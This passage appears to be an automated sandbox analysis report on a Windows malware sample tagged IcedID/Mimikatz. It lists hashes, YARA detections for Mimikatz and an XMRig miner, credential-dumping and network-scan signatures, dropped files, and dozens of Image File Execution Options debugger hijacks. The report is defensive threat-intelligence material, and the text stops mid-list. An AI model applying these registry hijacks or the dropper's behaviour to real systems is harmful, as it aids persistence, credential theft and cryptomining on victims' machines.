Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
31-08-2024 19:36
Behavioral task
behavioral1
Sample
2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe
-
Size
8.7MB
-
MD5
b81556a816679c536595700714256658
-
SHA1
b4937294723a628e6f351564b51c7ffd750f41f5
-
SHA256
20c0b98374adba440a78aa67d914e9a056327659bb45ed005ed1286d6b271926
-
SHA512
f984d76ce7dc003293445501d4b726cb7725e25fc08ae57ef82f1cf86ed4952223fbde9b290476e1df5a0ccfe638b1c73f86960ceefa1c0c66800c0425d020cb
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 4720 created 1712 4720 aginbln.exe 37 -
Contacts a large (19530) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/4076-178-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-182-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-203-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-216-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-222-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-234-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-251-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-267-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-269-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig behavioral2/memory/4076-271-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
resource yara_rule behavioral2/memory/4816-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4816-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00070000000233ee-5.dat mimikatz behavioral2/memory/524-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/2972-138-0x00007FF744C30000-0x00007FF744D1E000-memory.dmp mimikatz -
Drops file in Drivers directory 2 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts aginbln.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe aginbln.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe aginbln.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe aginbln.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 3768 netsh.exe 1008 netsh.exe -
Executes dropped EXE 30 IoCs
pid Process 524 aginbln.exe 4720 aginbln.exe 2912 wpcap.exe 3704 nhkqndyng.exe 2972 vfshost.exe 4936 fmiclltfn.exe 1036 xohudmc.exe 1780 hmhriy.exe 4076 unzsbd.exe 3960 fmiclltfn.exe 3472 fmiclltfn.exe 2780 fmiclltfn.exe 3988 fmiclltfn.exe 4764 aginbln.exe 4996 fmiclltfn.exe 4672 fmiclltfn.exe 4112 fmiclltfn.exe 4596 fmiclltfn.exe 1828 fmiclltfn.exe 5056 fmiclltfn.exe 4484 fmiclltfn.exe 4036 fmiclltfn.exe 4504 fmiclltfn.exe 1864 fmiclltfn.exe 2276 fmiclltfn.exe 3240 fmiclltfn.exe 1436 fmiclltfn.exe 4980 fmiclltfn.exe 3076 uedzbgtiz.exe 5964 aginbln.exe -
Loads dropped DLL 12 IoCs
pid Process 2912 wpcap.exe 2912 wpcap.exe 2912 wpcap.exe 2912 wpcap.exe 2912 wpcap.exe 2912 wpcap.exe 2912 wpcap.exe 2912 wpcap.exe 2912 wpcap.exe 3704 nhkqndyng.exe 3704 nhkqndyng.exe 3704 nhkqndyng.exe -
resource yara_rule behavioral2/files/0x0007000000023441-134.dat upx behavioral2/memory/2972-135-0x00007FF744C30000-0x00007FF744D1E000-memory.dmp upx behavioral2/memory/2972-138-0x00007FF744C30000-0x00007FF744D1E000-memory.dmp upx behavioral2/files/0x000700000002344c-141.dat upx behavioral2/memory/4936-142-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4936-150-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/files/0x0007000000023449-163.dat upx behavioral2/memory/4076-165-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/3960-171-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/3472-175-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4076-178-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/2780-180-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4076-182-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/3988-185-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4996-193-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4672-197-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4112-201-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4076-203-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/4596-206-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/1828-210-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/5056-214-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4076-216-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/4484-219-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4076-222-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/4036-224-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4504-228-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/1864-231-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/2276-233-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4076-234-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/3240-236-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/1436-238-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4980-240-0x00007FF6213D0000-0x00007FF62142B000-memory.dmp upx behavioral2/memory/4076-251-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/4076-267-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/4076-269-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx behavioral2/memory/4076-271-0x00007FF7F7E30000-0x00007FF7F7F50000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 88 ifconfig.me 87 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content aginbln.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE aginbln.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\hmhriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData aginbln.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE aginbln.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 aginbln.exe File created C:\Windows\SysWOW64\hmhriy.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft aginbln.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File opened for modification C:\Windows\ihguignb\docmicfg.xml aginbln.exe File created C:\Windows\wcbiqigng\upbdrjv\swrpwe.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\schoedcl.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\trch-1.dll aginbln.exe File created C:\Windows\ime\aginbln.exe aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\wpcap.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\posh-0.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\docmicfg.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\docmicfg.xml aginbln.exe File opened for modification C:\Windows\ihguignb\spoolsrv.xml aginbln.exe File opened for modification C:\Windows\wcbiqigng\imbbbzfne\Result.txt uedzbgtiz.exe File created C:\Windows\wcbiqigng\imbbbzfne\nhkqndyng.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\svschost.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\vimpcsvc.xml aginbln.exe File created C:\Windows\ihguignb\svschost.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\AppCapture32.dll aginbln.exe File created C:\Windows\wcbiqigng\Corporate\mimidrv.sys aginbln.exe File opened for modification C:\Windows\wcbiqigng\imbbbzfne\Packet.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\coli-0.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\libxml2.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\schoedcl.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\cnli-1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\AppCapture64.dll aginbln.exe File created C:\Windows\wcbiqigng\Corporate\mimilib.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\crli-0.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\Shellcode.ini aginbln.exe File opened for modification C:\Windows\wcbiqigng\Corporate\log.txt cmd.exe File created C:\Windows\ihguignb\docmicfg.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\svschost.xml aginbln.exe File created C:\Windows\ihguignb\vimpcsvc.xml aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\scan.bat aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\tibe-2.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\tucl-1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\ucl.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\spoolsrv.xml aginbln.exe File opened for modification C:\Windows\ihguignb\svschost.xml aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\wpcap.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\xdvl-0.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\libeay32.dll aginbln.exe File opened for modification C:\Windows\ihguignb\aginbln.exe 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\exma-1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\ssleay32.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\trfo-2.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\spoolsrv.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\docmicfg.xml aginbln.exe File created C:\Windows\ihguignb\spoolsrv.xml aginbln.exe File created C:\Windows\ihguignb\aginbln.exe 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe File opened for modification C:\Windows\ihguignb\schoedcl.xml aginbln.exe File created C:\Windows\wcbiqigng\Corporate\vfshost.exe aginbln.exe File opened for modification C:\Windows\ihguignb\vimpcsvc.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\zlib1.dll aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\spoolsrv.exe aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\Packet.dll aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\ip.txt aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\vimpcsvc.exe aginbln.exe File created C:\Windows\ihguignb\schoedcl.xml aginbln.exe File created C:\Windows\wcbiqigng\imbbbzfne\uedzbgtiz.exe aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\vimpcsvc.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\specials\schoedcl.xml aginbln.exe File created C:\Windows\wcbiqigng\UnattendGC\svschost.xml aginbln.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 4996 sc.exe 2628 sc.exe 1592 sc.exe 5112 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aginbln.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language uedzbgtiz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language xohudmc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2024-08-31_b81556a816679c536595700714256658_hacktools_icedid_mimikatz.exe Key opened 